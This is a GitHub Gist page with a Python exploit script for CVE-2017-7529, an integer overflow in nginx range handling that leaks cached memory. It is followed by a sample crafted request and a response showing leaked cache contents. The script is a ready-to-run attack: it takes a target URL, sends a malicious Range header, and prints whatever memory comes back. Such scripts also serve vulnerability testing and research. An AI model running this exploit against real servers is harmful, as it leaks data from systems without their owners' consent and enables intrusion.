-
-
Save AbdulConsole/c658cc155d38fab5a61ac8909d57c00f to your computer and use it in GitHub Desktop.
Nginx - Remote Integer Overflow Vulnerability (Memory Leak, CVE-2017-7529)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
# -*- coding:utf-8 -*- | |
# https://github.com/nixawk/labs/issues/15 | |
# Nginx - Remote Integer Overflow Vulnerability (Memory Leak) | |
# CVE-2017-7529 | |
import requests | |
import logging | |
import sys | |
logging.basicConfig(level=logging.INFO) | |
log = logging.getLogger(__name__) | |
def send_http_request(url, headers={}, timeout=8.0): | |
httpResponse = requests.get(url, headers=headers, timeout=timeout,verify=False) | |
httpHeaders = httpResponse.headers | |
log.info("status: %s: Server: %s", httpResponse.status_code, httpHeaders.get('Server', '')) | |
return httpResponse | |
def exploit(url): | |
log.info("target: %s", url) | |
httpResponse = send_http_request(url) | |
content_length = httpResponse.headers.get('Content-Length', 0) | |
# bytes_length = int(content_length) + 623 | |
bytes_length = int(content_length) + 623 | |
# content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length) | |
content_length = "bytes=-%d,-9223372036854%d" % (bytes_length, 776000 - bytes_length) | |
httpResponse = send_http_request(url, headers={ 'Range': content_length }) | |
if httpResponse.status_code == 206 and "Content-Range" in httpResponse.text: | |
log.info("[+] Vulnerable to CVE-2017-7529") | |
print(`httpResponse.text`) | |
else: | |
log.info("[?] Unknown Vulnerable") | |
if __name__ == '__main__': | |
if len(sys.argv) != 2: | |
print("[*] %s <url>" % sys.argv[0]) | |
sys.exit(1) | |
url = sys.argv[1] | |
exploit(url) | |
""" | |
GET /proxy/demo.png HTTP/1.1 | |
Accept-Encoding: identity | |
Range: bytes=-17208,-9223372036854758792 | |
Host: 127.0.0.1:8000 | |
Connection: close | |
User-Agent: Python-urllib/2.7 | |
HTTP/1.1 206 Partial Content | |
Server: nginx/1.13.1 | |
Date: Mon, 14 Aug 2017 05:53:54 GMT | |
Content-Type: multipart/byteranges; boundary=00000000000000000002 | |
Connection: close | |
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT | |
ETag: "40c9-5547a060fdf00" | |
X-Proxy-Cache: HIT | |
--00000000000000000002 | |
Content-Type: image/png | |
Content-Range: bytes -623-16584/16585 | |
.......<.Y......................lY....r:.Y.....@.`..v.q.."40c9-5547a060fdf00"................................................................................................................................................................................................................................................................. | |
KEY: httpGET127.0.0.1/proxy/demo.png | |
HTTP/1.1 200 OK | |
Date: Mon, 14 Aug 2017 05:51:46 GMT | |
Server: Apache/2.4.25 (Debian) | |
Last-Modified: Mon, 17 Jul 2017 02:19:08 GMT | |
ETag: "40c9-5547a060fdf00" | |
Accept-Ranges: bytes | |
Content-Length: 16585 | |
Connection: close | |
Content-Type: image/png | |
""" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment